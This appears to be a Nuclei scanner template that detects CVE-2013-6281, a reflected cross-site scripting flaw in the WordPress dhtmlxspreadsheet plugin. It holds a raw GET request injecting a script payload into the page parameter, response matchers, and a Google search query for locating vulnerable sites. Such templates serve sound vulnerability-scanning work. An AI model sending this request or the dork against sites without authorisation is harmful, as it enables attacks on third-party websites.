id: CVE-2013-6281 info: name: WordPress Spreadsheet - Cross-Site Scripting author: random-robbie severity: medium description: | WordPress Spreadsheet plugin contains a reflected cross-site scripting vulnerability in /dhtmlxspreadsheet/codebase/spreadsheet.php. reference: - https://wpscan.com/vulnerability/49785932-f4e0-4aaa-a86c-4017890227bf - http://web.archive.org/web/20210213174519/https://www.securityfocus.com/bid/63256/ - https://wordpress.org/plugins/dhtmlxspreadsheet/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6281 - https://nvd.nist.gov/vuln/detail/CVE-2013-6281 classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N cvss-score: 6.1 cve-id: CVE-2013-6281 cwe-id: CWE-79 metadata: google-query: inurl:/wp-content/plugins/dhtmlxspreadsheet verified: "true" tags: wp,wpscan,cve,cve2013,wordpress,xss,wp-plugin requests: - raw: - | GET /wp-content/plugins/dhtmlxspreadsheet/codebase/spreadsheet.php?page=%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}} matchers-condition: and matchers: - type: word part: body words: - "page: ''" - "dhx_rel_path" condition: and - type: word part: header words: - text/html - type: status status: - 200 # Enhanced by mp on 2022/08/12